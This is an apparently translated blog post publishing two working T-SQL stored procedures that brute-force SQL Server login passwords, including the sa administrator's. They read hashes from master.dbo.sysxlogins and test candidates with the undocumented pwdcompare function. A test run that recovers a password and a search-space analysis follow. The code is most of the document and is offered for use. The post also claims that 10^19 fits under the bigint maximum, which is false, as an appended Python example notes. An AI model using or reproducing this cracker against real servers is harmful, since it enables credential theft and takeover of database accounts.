This code brute-forces MSSQL login names and passwords, including the password of the administrator account sa.
A stored procedure for cracking the SQL Server sa password circulates on the Internet; its method is to brute-force MSSQL login names and passwords, including the sa password. I made small modifications to that code and did some performance analysis.
First, the core idea of the cracking program is the Master.dbo.sysxlogins table, which stores the account password hashes, together with the undocumented password-comparison function pwdcompare. After analysing it, I modified part of the code; the code before and after the changes is posted below.
The original stored procedure for SQL Server sa password cracking is as follows:
ALTER PROC p_GetPassword
 @username sysname=null,  -- user name; if not specified, all users are listed
 @pwdlen int=2            -- number of characters of the password to crack; default is 2 and below
as
set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

-- character table: ids 0..254, each candidate character is char(id)
select top 255 id=identity(int,0,1) into #t from syscolumns
alter table #t add constraint pk_#t primary key(id)

-- one row per login; jm=1 marks a login whose password is already known (or null)
select name,password
 ,type=case when xstatus&2048=2048 then 1 else 0 end
 ,jm=case when password is null then 1 else 0 end
 ,pwdstr=cast('' as sysname)
 ,pwd=cast('' as varchar(8000))
 into #pwd
from master.dbo.sysxlogins a
where srvid is null
 and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
declare @l int
select @l=0
 ,@s1='char(aa.id)'             -- candidate string built from the joined tables
 ,@s2='cast(aa.id as varchar)'  -- its ASCII codes, for the result set
 ,@s3=',#t aa'                  -- the cross join: one #t alias per character position

-- length 1
exec('
update pwd set jm=1,pwdstr='+@s1+'
 ,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')

-- each pass adds one more #t alias (ab, ac, ...) and therefore one more character
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
begin
 select @l=@l+1
  ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
  ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
  ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
 exec('
 update pwd set jm=1,pwdstr='+@s1+'
  ,pwd='+@s2+'
 from #pwd pwd'+@s3+'
 where pwd.jm=0
  and pwdcompare('+@s1+',pwd.password,pwd.type)=1
 ')
end

select [user name]=name,[password]=pwdstr,[password ascii]=pwd
from #pwd
go
Here is my revised code:
ALTER PROC p_GetPassword2
 @username sysname=null,  -- user name; if not specified, all users are listed
 @pwdlen int=2            -- number of characters of the password to crack; default is 2 and below
as
set nocount on
if object_id(N'tempdb..#t') is not null
 drop table #t
if object_id(N'tempdb..#pwd') is not null
 drop table #pwd
set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

-- character set: 66 regular keyboard characters (uppercase letters, digits, punctuation)
declare @ss varchar(256)
--select @ss='123456789'
select @ss='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
select @ss=@ss+'0123456789-=[]\;,./'
select @ss=@ss+'~!@#$%^&*()_+{}|:"<>?'
--select @ss=@ss+'abcdefghijklmnopqrstuvwxyz'

-- character table: one row per character of @ss
create table #t(c char(1) not null)
alter table #t add constraint pk_#t primary key clustered(c)
declare @index int
select @index=1
while @index<=len(@ss)
begin
 insert #t select substring(@ss,@index,1)
 select @index=@index+1
end

-- one row per login; times records the number of rows scanned at each length
select name,password
 ,type=case when xstatus&2048=2048 then 1 else 0 end
 ,jm=case when password is null then 1 else 0 end
 ,pwdstr=cast('' as sysname)
 ,pwd=cast('' as varchar(8000))
 ,times=cast('' as varchar(8000))
 into #pwd
from master.dbo.sysxlogins a
where srvid is null
 and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@stimes varchar(8000)
declare @l int,@t bigint
-- rows the cross join scans at length 1: accounts * len(@ss)
-- (cast to bigint so that power() does not overflow int at larger lengths)
select @t=count(1)*power(cast(len(@ss) as bigint),1) from #pwd
select @l=0
 ,@s1='aa.c'
 ,@s2='cast(ascii(aa.c) as varchar)'
 ,@s3=',#t aa'
 ,@stimes='1th,'+cast(@t as varchar)+'rows'
exec('
update pwd set jm=1,pwdstr='+@s1+'
 ,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
 and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')

while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
begin
 select @l=@l+1
 -- rows scanned at length @l+1: accounts * len(@ss)^(@l+1)
 select @t=count(1)*power(cast(len(@ss) as bigint),@l+1) from #pwd
 print @t
 select
  @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
  ,@s2=@s2+'+'',''+cast(ascii('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
  ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
  ,@stimes=@stimes+';'+cast(@l+1 as varchar(2))+'th,'+cast(@t as varchar)+'rows'
 exec('
 update pwd set jm=1,pwdstr='+@s1+'
  ,pwd='+@s2+'
  ,times='''+@stimes+'''
 from #pwd pwd'+@s3+'
 where pwd.jm=0
  and pwdcompare('+@s1+',pwd.password,pwd.type)=1
 ')
end

select username=name,[password]=pwdstr,[password ascii]=pwd,[queries and rows]=times
from #pwd

if object_id(N'tempdb..#t') is not null
 drop table #t
if object_id(N'tempdb..#pwd') is not null
 drop table #pwd
I tested it as follows:
exec p_GetPassword2 'B',6
Result:
username  password  password ascii  queries and rows
B         123       49,50,51        1th,66rows;2th,4356rows;3th,287496rows
Performance Analysis:
In this example, take the maximum number of rows a single query can evaluate to be the maximum bigint value, 9223372036854775807, and treat that as the host's maximum performance, to get a rough estimate of cracking capacity.
For a password of a given length, cracking time and resource cost grow as an exponential function whose base is the number of characters used for cracking and whose exponent is the password length. That is, the condition is: number of accounts cracked × (number of characters used)^(longest password length) < host maximum performance:
The original stored procedure uses 256 cracking characters, so it can theoretically crack a 7-character password, since 256^7 < max(bigint).
My modified stored procedure uses 66 regular keyboard characters, so it can theoretically crack a 10-character password, since 66^10 < max(bigint).
If the password is known to be a combination of the 10 numeric characters only, a 19-character password can theoretically be cracked, that is, 10^19 < max(bigint).
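The search-space arithmetic above, worked out as an added example (not code from the original post): it reproduces the per-length row counts that the revised procedure's times column reports and computes, for each alphabet size, the longest length whose full search space stays under the bigint bound; the alphabet sizes, account count and bound are the ones given in the text, and policy_margin is an added defender-side check of how far a minimum-length policy sits above that bound.

```python
# Added example (not the post's code): search-space arithmetic for the
# cross-join brute force described above, using the post's bigint bound.

BIGINT_MAX = 9223372036854775807  # the post's proxy for host maximum performance


def rows_per_depth(alphabet_size, max_len, accounts=1):
    """Rows the UPDATE scans at each password length 1..max_len.

    Length L joins L copies of the character table, so the cross join has
    accounts * alphabet_size**L rows; these are the 'Nth,<rows>rows'
    entries the revised procedure stores in its times column.
    """
    return [accounts * alphabet_size ** n for n in range(1, max_len + 1)]


def times_column(alphabet_size, max_len, accounts=1):
    """Format the counts the way the revised procedure's times column does."""
    rows = rows_per_depth(alphabet_size, max_len, accounts)
    return ";".join(f"{n}th,{r}rows" for n, r in enumerate(rows, start=1))


def max_crackable_length(alphabet_size, accounts=1, bound=BIGINT_MAX):
    """Longest length satisfying the post's condition
    accounts * alphabet_size**length < bound."""
    length = 0
    while accounts * alphabet_size ** (length + 1) < bound:
        length += 1
    return length


def policy_margin(alphabet_size, min_len, accounts=1, bound=BIGINT_MAX):
    """Defender's check: ratio of the search space a minimum-length policy
    forces (accounts * alphabet_size**min_len) to the bound. Above 1.0 the
    policy already exceeds what the post treats as one feasible query."""
    return accounts * alphabet_size ** min_len / bound


if __name__ == "__main__":
    # the post's test: 66-character alphabet, one login, '123' found at length 3
    print(times_column(66, 3))
    for size in (256, 66, 10):
        print(size, "characters ->", max_crackable_length(size))
    print("margin for 12 chars over a 66-char alphabet:", policy_margin(66, 12))
```

For the ten-digit alphabet the function returns 18 rather than 19, because 10^19 is larger than 9223372036854775807.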